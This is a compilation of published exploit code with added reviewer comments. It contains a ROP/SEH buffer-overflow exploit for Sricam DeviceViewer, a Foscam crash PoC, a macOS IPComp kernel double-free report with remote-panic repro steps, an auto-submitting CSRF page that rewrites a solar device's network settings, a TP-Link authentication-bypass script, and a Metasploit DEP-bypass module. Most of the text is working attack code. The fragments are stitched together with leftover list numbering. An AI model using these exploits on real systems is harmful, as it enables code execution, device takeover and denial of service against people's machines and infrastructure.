# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1
# Steps to reproduce:
# 1. Get the WinExec address from arwin.exe kernel32.dll WinExec
# 2. Change the related address in the PoC
# 3. Generate the payload using the PoC
# 4. Log in the Sricam DeviceViewer application
# 5. Go to System Configuration -> User Management
# 6. Put the content of the generated file in User Info -> Username
# 7. Click on Add
# 8. A command shell will appear
#
# Reviewer notes (defensive summary):
# - Python 2 script: pack() returns str there; under Python 3 the ''.join() in
#   create_rop_chain() raises TypeError because pack() returns bytes.
# - Every gadget address below is a fixed absolute address attributed (per the
#   author's comments) to avcodec-54.dll / avformat-54.dll / avutil-50.dll, so the
#   chain depends on those DLLs not being ASLR-relocated; the kernel32 WinExec
#   pointer is additionally system-specific. Relinking those modules with ASLR
#   (/DYNAMICBASE) and SafeSEH would invalidate the addresses and the SEH overwrite.
# - `unpack` is imported but never used.
#!/usr/bin/python
from struct import pack, unpack


def create_rop_chain():
    """Return the ROP chain as a packed little-endian string of 32-bit gadget
    addresses / immediates.

    Per the inline annotations, the chain writes the ASCII bytes "cmd\\0" to a
    writable location, moves that pointer into ECX, places the WinExec() address
    in EBX and a CALL EBX gadget in EDX, and finally uses PUSHAD # RETN to
    dispatch the call (classic DEP bypass without executing stack data).
    """
    rops = [
        0x6a1142aa,  # XOR EDX,EDX # RETN
        0x6a569810,  # POP EDX # RETN [avcodec-54.dll]
        0x6ae9c126,  # &Writable location [avutil-50.dll]
        0x6a5dac8a,  # POP EAX # RETN
        0xff9b929d,  # NEG "cmd\0"  (negated so the string bytes avoid NUL in the input)
        0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]
        0x6994766b,  # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
        # Padding consumed by the ADD ESP,3C and the POPs of the gadget above.
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a18e062,  # ADD ESP, 10 # RETN ---> ESI
        0x6a2420ea,  # ROP NOP ---> EDI
        0x6a45e446,  # XCHG EAX,EDX # RETN [avcodec-54.dll]
        0x6a29d716,  # XCHG EAX,ECX # RETN [avcodec-54.dll] ## ECX = ascii "cmd\0"
        0x6a569810,  # POP EDX # RETN [avcodec-54.dll]
        0x6a36264a,  # CALL EBX ## EDX = CALL EBX
        0x6a5dac8a,  # POP EAX # RETN
        0x76e33231,  # ptr to WinExec() [kernel32.dll] #### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication
        0x6a150411,  # XCHG EAX,EBX # RETN [avcodec-54.dll] ## EBX = &WinExec
        0x6a5dac8a,  # POP EAX # RETN
        0xffffffff,  # -0x00000001-> ebx
        0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll] ## EAX = 1
        0x6a5eb992,  # PUSHAD # RETN [avcodec-54.dll]
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
        0x6a2420ea,  # ROP NOP
    ]
    return ''.join(pack('<I', _) for _ in rops)


def nops(length):
    """Return `length` bytes of 0x90 (x86 NOP), used here purely as filler."""
    return "\x90" * length


rop_chain = create_rop_chain()
maxlen = 5000  # total length of the generated username value

# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} : # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)
# Don't care nseh
nseh = nops(4)

# Layout (byte offsets): [0,8) filler, [8, 8+len(rop_chain)) ROP chain, filler up to
# 360, 20 more filler bytes, nSEH at 380, SEH handler (pivot gadget) at 384, then
# 300 bytes of filler. The SEH overwrite is what redirects control into the chain.
payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec)  # More junk to reach 5000
print("Exploit Length: " + str(len(payload)))

try:
    fname = "exprop.txt"
    exploit = open(fname, "w")
    print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
    print("Author: Alessandro Magnosi\n")
    print("[*] Creating evil username")
    exploit.write(payload)
    exploit.close()
    print("[+] Username file created\n")
    print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
    print("[+] A command shell will open")
except:
    # NOTE(review): bare except swallows every error (including KeyboardInterrupt)
    # and the file handle is not closed on a failed write.
    print("[!] Error creating the file")
  10. # Exploit Title: Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC) # Author: Alessandro Magnosi # Date: 2019-10-09 # Vendor Homepage: https://www.foscam.com/ # Software Link : https://www.foscam.com/downloads/appsoftware.html?id=5 # Tested Version: 1.1.6.6 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 7 SP1 x86 en, Windows 10 Pro x64 it # Steps to Produce the Crash: # 1.- Run python code : python foscam-vms-uid-dos.py # 2.- Open FoscamVMS1.1.6.txt and copy its content to clipboard # 3.- Open FoscamVMS # 4.- Go to Add Device # 5.- Choose device type "NVR" # 6.- Copy the content of the file into UID # 7.- Click on Login Check # 8.- Crashed #!/usr/bin/python buffer = "A" * 5000 f = open ("FoscamVMS1.1.6.txt", "w") f.write(buffer) f.close()
  11. === Summary === This report describes a bug in the XNU implementation of the IPComp protocol (https://tools.ietf.org/html/rfc3173). This bug can be remotely triggered by an attacker who is able to send traffic to a macOS system (iOS AFAIK isn't affected) *over two network interfaces at the same time*. === Some basics to provide context === IPComp is a protocol for compressing the payload of IP packets. The XNU implementation of IPComp is (going by the last public XNU release) enabled only on X86-64; ARM64 doesn't seem to have the feature enabled at all (look for ipcomp_zlib in config/MASTER.x86_64 and config/MASTER.arm64). In other words, it's enabled on macOS and disabled on iOS. While IPComp is related to IPsec, the IPComp input path processes input even when the user has not configured any IPsec stuff on the system. zlib requires fairly large buffers for decompression and especially for compression. In order to avoid allocating such buffers for each packet, IPComp uses two global z_stream instances "deflate_stream" and "inflate_stream". If IPComp isn't used, the buffer pointers in these z_stream instances remain NULL; only when IPComp is actually used, the kernel will attempt to initialize the buffer pointers. As far as I can tell, the IPComp implementation of XNU has been completely broken for years, which makes it impossible to actually reach the decompression code. ipcomp_algorithm_lookup() is responsible for allocating global buffers for the compression and decompression code; however, all of these allocations go through deflate_alloc(), which (since xnu-1228, which corresponds to macOS 10.5 from 2007) calls _MALLOC() with M_NOWAIT. _MALLOC() leads to kalloc_canblock(), which, if the M_NOWAIT flag was set and the allocation is too big for a kalloc zone (size >= kalloc_max_prerounded), immediately returns NULL. 
On X86-64, kalloc_max_prerounded is 0x2001; both deflateInit2() and inflateInit2() attempt allocations bigger than that, causing them to fail with Z_MEM_ERROR, as is visible with dtrace when observing the system's reaction to a single incoming IPComp packet [empty lines removed]: ``` bash-3.2# ./inflate_test.dtrace dtrace: script './inflate_test.dtrace' matched 11 probes CPU ID FUNCTION:NAME 0 243037 deflateInit2_:entry deflate init (thread=ffffff802db84a40) 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x1738, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0xffffff80496b9800 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x2000, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0xffffff802f42f000 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x2000, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0x0 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x20000, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0x0 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x20000, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0x0 0 243038 deflateInit2_:return rval=0xfffffffc 0 243073 inflateInit2_:entry inflate init (thread=ffffff802db84a40) 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x2550, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0x0 0 243074 inflateInit2_:return rval=0xfffffffc ``` (On iOS, the kalloc() limit seems to be higher, so if IPComp was built there, the input path might actually work?) === main bug description === IPComp uses a single global `static z_stream inflate_stream` for decompressing all incoming packets. This global is used without any locking. 
While processing of packets from a single interface seems to be single-threaded, packets arriving on multiple ethernet interfaces at the same time (or on an ethernet interface and a non-ethernet interface) can be processed in parallel (see dlil_create_input_thread() and its caller for the precise threading rules). Since zlib isn't designed for concurrent use of a z_stream, this leads to memory corruption. If IPComp actually worked, I believe that this bug would lead to things like out-of-bounds reads, out-of-bounds writes and use-after-frees. However, since IPComp never actually manages to set up the compression and decompression state, the bug instead manifests in the code that, for every incoming IPComp packet, attempts to set up the deflate buffers and tears down the successfully allocated buffers because some of the allocations failed: ``` int ZEXPORT deflateInit2_(z_streamp strm, int level, int method, int windowBits, int memLevel, int strategy, const char *version, int stream_size) { [...] if (memLevel < 1 || memLevel > MAX_MEM_LEVEL || method != Z_DEFLATED || windowBits < 8 || windowBits > 15 || level < 0 || level > 9 || strategy < 0 || strategy > Z_FIXED) { return Z_STREAM_ERROR; } if (windowBits == 8) windowBits = 9; /* until 256-byte window bug fixed */ s = (deflate_state *) ZALLOC(strm, 1, sizeof(deflate_state)); if (s == Z_NULL) return Z_MEM_ERROR; strm->state = (struct internal_state FAR *)s; [...] s->window = (Bytef *) ZALLOC(strm, s->w_size, 2*sizeof(Byte)); s->prev = (Posf *) ZALLOC(strm, s->w_size, sizeof(Pos)); s->head = (Posf *) ZALLOC(strm, s->hash_size, sizeof(Pos)); s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */ overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2); s->pending_buf = (uchf *) overlay; [...] if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL || s->pending_buf == Z_NULL) { [...] deflateEnd (strm); return Z_MEM_ERROR; } [...] } [...] int ZEXPORT deflateEnd(z_streamp strm) { [...] 
/* Deallocate in reverse order of allocations: */ TRY_FREE(strm, strm->state->pending_buf); TRY_FREE(strm, strm->state->head); TRY_FREE(strm, strm->state->prev); TRY_FREE(strm, strm->state->window); ZFREE(strm, strm->state); strm->state = Z_NULL; return status == BUSY_STATE ? Z_DATA_ERROR : Z_OK; } ``` When multiple executions of this code race, it is possible for two threads to free the same buffer, causing a double-free: ``` *** Panic Report *** panic(cpu 2 caller 0xffffff8012802df5): "zfree: double free of 0xffffff80285d9000 to zone kalloc.8192\n"@/BuildRoot/Library/Caches/com.apple.xbs/Sources/xnu/xnu-4903.261.4/osfmk/kern/zalloc.c:1304 Backtrace (CPU 2), Frame : Return Address 0xffffff912141b420 : 0xffffff80127aea2d mach_kernel : _handle_debugger_trap + 0x47d 0xffffff912141b470 : 0xffffff80128e9e95 mach_kernel : _kdp_i386_trap + 0x155 0xffffff912141b4b0 : 0xffffff80128db70a mach_kernel : _kernel_trap + 0x50a 0xffffff912141b520 : 0xffffff801275bb40 mach_kernel : _return_from_trap + 0xe0 0xffffff912141b540 : 0xffffff80127ae447 mach_kernel : _panic_trap_to_debugger + 0x197 0xffffff912141b660 : 0xffffff80127ae293 mach_kernel : _panic + 0x63 0xffffff912141b6d0 : 0xffffff8012802df5 mach_kernel : _zcram + 0xa15 0xffffff912141b710 : 0xffffff8012804d4a mach_kernel : _zfree + 0x67a 0xffffff912141b7f0 : 0xffffff80127bac58 mach_kernel : _kfree_addr + 0x68 0xffffff912141b850 : 0xffffff8012dfc837 mach_kernel : _deflateEnd + 0x87 0xffffff912141b870 : 0xffffff8012dfc793 mach_kernel : _deflateInit2_ + 0x253 0xffffff912141b8c0 : 0xffffff8012c164a3 mach_kernel : _ipcomp_algorithm_lookup + 0x63 0xffffff912141b8f0 : 0xffffff8012c16fb2 mach_kernel : _ipcomp4_input + 0x112 0xffffff912141b990 : 0xffffff8012b89907 mach_kernel : _ip_proto_dispatch_in_wrapper + 0x1a7 0xffffff912141b9e0 : 0xffffff8012b8bfa6 mach_kernel : _ip_input + 0x18b6 0xffffff912141ba40 : 0xffffff8012b8a5a9 mach_kernel : _ip_input_process_list + 0xc69 0xffffff912141bcb0 : 0xffffff8012aac3ed mach_kernel : 
_proto_input + 0x9d 0xffffff912141bce0 : 0xffffff8012a76c41 mach_kernel : _ether_attach_inet + 0x471 0xffffff912141bd70 : 0xffffff8012a6b036 mach_kernel : _dlil_rxpoll_set_params + 0x1b36 0xffffff912141bda0 : 0xffffff8012a6aedc mach_kernel : _dlil_rxpoll_set_params + 0x19dc 0xffffff912141bf10 : 0xffffff8012a692e9 mach_kernel : _ifp_if_ioctl + 0x10d9 0xffffff912141bfa0 : 0xffffff801275b0ce mach_kernel : _call_continuation + 0x2e BSD process name corresponding to current thread: kernel_task Boot args: -zp -v keepsyms=1 Mac OS version: 18F132 Kernel version: Darwin Kernel Version 18.6.0: Thu Apr 25 23:16:27 PDT 2019; root:xnu-4903.261.4~2/RELEASE_X86_64 Kernel UUID: 7C8BB636-E593-3CE4-8528-9BD24A688851 Kernel slide: 0x0000000012400000 Kernel text base: 0xffffff8012600000 __HIB text base: 0xffffff8012500000 System model name: Macmini7,1 (Mac-XXXXXXXXXXXXXXXX) ``` === Repro steps === You'll need a Mac (I used a Mac mini) and a Linux workstation. Stick two USB ethernet adapters into the Mac. Make sure that your Linux workstation has two free ethernet ports; if it doesn't, also stick USB ethernet adapters into your workstation. Take two ethernet cables; for both of them, stick one end into the Linux workstation and the other end into the Mac. Set up static IP addresses for both interfaces on the Linux box and the Mac. I'm using: - Linux, first connection: 192.168.250.1/24 - Mac, first connection: 192.168.250.2/24 - Linux, second connection: 192.168.251.1/24 - Mac, second connection: 192.168.251.2/24 On the Linux workstation, ping both IP addresses of the Mac, then dump the relevant ARP table entries: ``` $ ping -c1 192.168.250.2 PING 192.168.250.2 (192.168.250.2) 56(84) bytes of data. 64 bytes from 192.168.250.2: icmp_seq=1 ttl=64 time=0.794 ms [...] $ ping -c1 192.168.251.2 PING 192.168.251.2 (192.168.251.2) 56(84) bytes of data. 64 bytes from 192.168.251.2: icmp_seq=1 ttl=64 time=0.762 ms [...] 
$ arp -n | egrep '192\.168\.25[01]' 192.168.250.2 ether aa:aa:aa:aa:aa:aa C eth0 192.168.251.2 ether bb:bb:bb:bb:bb:bb C eth1 $ ``` On the Linux workstation, build the attached ipcomp_uaf.c and run it: ``` $ gcc -o ipcomp_recursion ipcomp_recursion.c -Wall $ sudo bash # ./ipcomp_uaf usage: ./ipcomp_uaf <if1> <target_mac1> <src_ip1> <dst_ip1> <if2> <target_mac2> <src_ip2> <dst_ip2> # ./ipcomp_uaf eth0 aa:aa:aa:aa:aa:aa 192.168.250.1 192.168.250.2 eth1 bb:bb:bb:bb:bb:bb 192.168.251.1 192.168.251.2 ``` After something like a second, you should be able to observe that the Mac panics. I have observed panics via double-free and via null deref triggered by the PoC. (Stop the PoC afterwards, otherwise it'll panic again as soon as the network interfaces are up.) (The PoC also works if you use broadcast addresses as follows: ``` # ./ipcomp_uaf eth0 ff:ff:ff:ff:ff:ff 0.0.0.0 255.255.255.255 eth1 ff:ff:ff:ff:ff:ff 0.0.0.0 255.255.255.255 ```) === Fixing the bug === I believe that by far the best way to fix this issue is to rip out the entire feature. Unless I'm missing some way for the initialization to succeed, it looks like nobody can have successfully used this feature in the last few years; and apparently nobody felt strongly enough about that to get the feature fixed. At the same time, this thing is remote attack surface in the IP stack, and it looks like it has already led to a remote DoS bug in the past - the first search result on bing.com for both "ipcomp macos" and "ipcomp xnu" is <https://www.exploit-db.com/exploits/5191>. In case you decide to fix the bug in a different way, please note: - I believe that this can *NOT* be fixed by removing the PR_PROTOLOCK flag from the entries in `inetsw` and `inet6sw`. While removal of that flag would cause the input code to take the domain mutex before invoking the protocol handler, IPv4 and IPv6 are different domains, and so concurrent processing of IPv4+IPComp and IPv6+IPComp packets would probably still trigger the bug. 
- If you decide to fix the memory allocation of IPComp so that the input path works again (please don't - you'll never again have such a great way to prove that nobody is using that code), I think another bug will become reachable: I don't see anything that prevents unbounded recursion between ip_proto_dispatch_in() and ipcomp4_input() using an IP packet with a series of IPComp headers, which would be usable to cause a kernel panic via stack overflow with a single IP packet. In case you want to play with that, I wrote a PoC that generates packets with 100 such headers and attached it as ipcomp_recursion.c. (The other IPv6 handlers for pseudo-protocols like IPPROTO_FRAGMENT seem to avoid this problem by having the ) Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47479.zip
# Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery
# Date: 2019-10-08
# Exploit Author: Borja Merino and Eduardo Villaverde
# Vendor Homepage: https://www.sma.de
# Version: Firmware Version 1.6 and prior
# Tested on: Sunny WebBox SMA Solar Device (Firmware Version 1.6)
# CVE : CVE-2019-13529
# ICS-Cert Advisory: https://www.us-cert.gov/ics/advisories/icsa-19-281-01
<!-- Change any hidden value -->
<!--
  Reviewer notes: the POST below carries only fixed field values and no
  per-session anti-CSRF token, which is why an auto-submitted cross-origin form
  is accepted by the device. Defensive fixes on the device side are a
  synchronizer token validated on wb_network_changed.htm and/or Origin/Referer
  checks; SameSite=Lax/Strict on the session cookie also blocks this cross-site
  auto-submit in current browsers. X.X.X.X is a placeholder for the device address.
-->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://X.X.X.X/wb_network_changed.htm' target="csrf-frame" id="csrf-form">
<!-- network settings form fields; every value is attacker-chosen -->
<input type='hidden' name='RadioButtonDhcp' value='off'>
<input type='hidden' name='IpAddr' value='1.1.1.1'>
<input type='hidden' name='SubnetMask' value='255.255.255.0'>
<input type='hidden' name='Gateway' value='1.1.1.1'>
<input type='hidden' name='DnsIpAddr' value='5.5.5.1'>
<input type='hidden' name='Dns2IpAddr' value='5.5.5.2'>
<input type='hidden' name='StaticNatPortHttp' value='80'>
<input type='hidden' name='WebserverPort' value='80'>
<input type='hidden' name='WebservicePort' value='80'>
<input type='hidden' name='RadioButtonModbus' value='off'>
<input type='hidden' name='ModbusPort' value='502'>
<input type='hidden' name='BConfirm' value='Confirmar'>
<input type='submit' value='submit'>
</form>
<!-- submits the form into the hidden iframe without user interaction -->
<script>document.getElementById("csrf-form").submit()</script>
# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass
# Date: 2019-06-20
# Exploit Author: Uriel Kosayev
# Vendor Homepage: https://www.tp-link.com
# Version: TL-WR1043ND V2
# Tested on: TL-WR1043ND V2
# CVE : CVE-2019-6971
# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971
#
# Reviewer notes: Python 2 script (raw_input / input). Known defects left as-is:
# - `option_1 is 1` / `option_2 is 2` compare by identity; this only works because
#   CPython caches small ints (Python 3.8+ warns). `==` is the correct operator.
# - In Python 2, input() evaluates the typed text as an expression, so the menu
#   prompts themselves execute arbitrary user input.
# - `generate` is sliced out of `response`, so `generate in response` is always
#   true whenever the split succeeds; it does not really test anything.
# - The "Please choose the correct option" message in the inner else branch is a
#   bare string expression and is never printed.
# - `requests` is a third-party dependency.
import requests

# Banner; line breaks were lost in the source as published.
ascii = ''' __________ __ _ __ /_ __/ __ \ / / (_)___ / /__ / / / /_/ /_____/ / / / __ \/ //_/ / / / ____/_____/ /___/ / / / / ,< /_/ /_/ /_____/_/_/ /_/_/|_| '''
print(ascii)

Default_Gateway = raw_input("Enter your TP-Link router IP: ")

# Constants
url = 'http://'
url2 = '/userRpm/LoginRpm.htm?Save=Save'
full = url + Default_Gateway + url2
# full = str(full)

# The full GET request with the cookie authorization hijacked
# (the static Cookie value below is the credential the bypass relies on; the
# device accepts it without a prior login, which is the CVE-2019-6971 issue).
req_header = {
    'Host': '{}'.format(Default_Gateway),
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
    'Connection': 'close',
    'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
    'Upgrade-Insecure-Requests': '1'
}

try:
    response = requests.get(full, headers=req_header).content
except requests.exceptions.ConnectionError:
    print("Enter a valid Default Gateway IP address\nExiting...")
    exit()

# Gets the randomized URL "session ID" (fourth '/'-separated token of the body;
# raises IndexError if the body has fewer than four slashes).
generate = response.split('/')[3]

option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")
if option_1 is 1:
    if generate in response:
        print('Vulnerable!\n')
        option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
        if option_2 is 2:
            newssid = raw_input('New name: ')
            # Only ssid1 is user-supplied; every other parameter is fixed.
            ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format( newssid)
            changessid_full = url + Default_Gateway + '/' + generate + ssid_url
            requests.get(changessid_full, headers=req_header)
            print('Changed to: {}'.format(newssid))
        else:
            # NOTE(review): string expression has no effect; nothing is printed here.
            ("Please choose the correct option.\nExiting...")
            exit()
    else:
        print('Not Vulnerable')
        exit()
else:
    print("Please choose the correct option.\nExiting...")
    exit()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# File-format exploit: writes a .asx playlist whose oversized "http://..." entry
# overflows a stack buffer in ASX to MP3 converter 3.1.3.7 and, via a ROP chain
# in MSA2Mfilter03.dll, calls VirtualAlloc() to bypass DEP before running the
# payload. Nothing is sent over the network; the victim must open the file.
#
# Reviewer note: every gadget address is a fixed 0x1002xxxx/0x1003xxxx/0x1004xxxx
# value, i.e. the chain assumes MSA2Mfilter03.dll is loaded at its preferred base
# (no ASLR). An ASLR-enabled build of that module would invalidate the chain.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
      'Description'    => %q{ This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7. By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode. Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Maxim Guslyaev', # EDB POC, Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2017-15221' ],
          [ 'EDB', '47468' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7 Enterprise/10 Pro',
            {
              # Value written over the saved return address; a lone RETN gadget
              # that slides execution into the ROP chain that follows it.
              'Ret' => 0x1002D038 # RET
            }
          ]
        ],
      'Payload'        =>
        {
          # Bytes the vulnerable parser would truncate or mangle.
          'BadChars' => "\x00\x09\x0a"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Oct 06 2019",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
      ])
  end

  # Builds the .asx contents and hands them to the FILEFORMAT mixin (file_create).
  # Layout: "http://" (7 bytes) + 17417 filler bytes, so the return address sits
  # at offset 17424; "CCCC" pads to the chain. The chain then loads the
  # VirtualAlloc() arguments into registers (EDX = allocation type, EBX = size,
  # ECX = protection, ESI = &VirtualAlloc, EBP = stack-cleanup gadget, EDI = ROP
  # NOP, EAX = PUSHAD gadget) and triggers PUSHAD # RETN, the standard
  # mona-style DEP bypass; the payload is placed after a short NOP sled.
  def exploit
    buf = "http://"
    buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"

    ## Save allocation type (0x1000) in EDX
    buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
    buf += [0x11111111].pack("V")
    buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
    buf += [0x1002D493].pack("V") # POP EDX # RETN
    buf += [0xEEEEFEEF].pack("V")
    buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
    buf += [0x41414141].pack("V")

    ## Save the address of VirtualAlloc() in ESI
    buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
    buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
    buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
    buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
    buf += [0x41414141].pack("V")
    buf += [0x41414141].pack("V")

    ## Save the size of the block in EBX
    buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
    # Thirteen ADD EAX,29 gadgets build the size without NUL bytes in the file.
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

    ## Save the address of (# ADD ESP,8 # RETN) in EBP
    buf += [0x10031c6c].pack("V") # POP EBP # RETN
    buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
    #buf += [0x1003df73].pack("V") # & PUSH ESP # RETN

    ## Save memory protection code (0x40) in ECX
    # ECX = -1, incremented twice to 1, then doubled six times = 0x40 (PAGE_EXECUTE_READWRITE).
    buf += [0x1002ca22].pack("V") # POP ECX # RETN
    buf += [0xFFFFFFFF].pack("V")
    buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
    buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN

    ## Save ROP-NOP in EDI
    buf += [0x1002e346].pack("V") # POP EDI # RETN
    buf += [0x1002D038].pack("V") # RETN

    ## Save NOPs in EAX
    #buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
    #buf += [0x90909090].pack("V") # nop

    ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
    # The PUSHAD address is assembled as 0xA4E2F275 + 0x5B5D5E5F so that no
    # bad character appears in the file.
    buf += [0x1002E516].pack("V") # POP EAX # RETN
    buf += [0xA4E2F275].pack("V")
    buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
    buf += [0x10040ce5].pack("V") # PUSH EAX # RETN

    buf += "\x90" * 4
    buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
    buf += "\x90" * 20
    buf += payload.encoded

    file_create(buf)
  end
end
